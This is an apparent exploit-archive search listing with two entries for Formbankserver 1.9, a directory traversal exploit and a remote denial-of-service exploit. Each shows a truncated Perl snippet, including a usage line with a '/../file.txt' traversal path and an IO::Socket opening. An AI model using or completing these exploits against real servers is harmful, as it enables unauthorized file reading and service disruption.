2 matches found
Formbankserver 1.9 (Name) Directory Transversal Vulnerability
No description provided by source. !perl found by Bl0od3r visit http://dc3.dl.am download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796 developer:http://www.fersch.de/formbankserver/ use LWP::Simple; sub usage die"file.pl host.com /../file.txt"; $host= $ARGV0; $file= $ARGV1; if !$host die"...
Formbankserver 1.9 (Name) Remote Denial of Service Exploit
No description provided by source. !perl Vulnerability found by Bl0od3r visit http://dc3.dl.am to see more exploits http://www.fersch.de/formbankserver/ download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796 - Hide quoted text - use IO::Socket; use warnings; package exploit; sub new bless...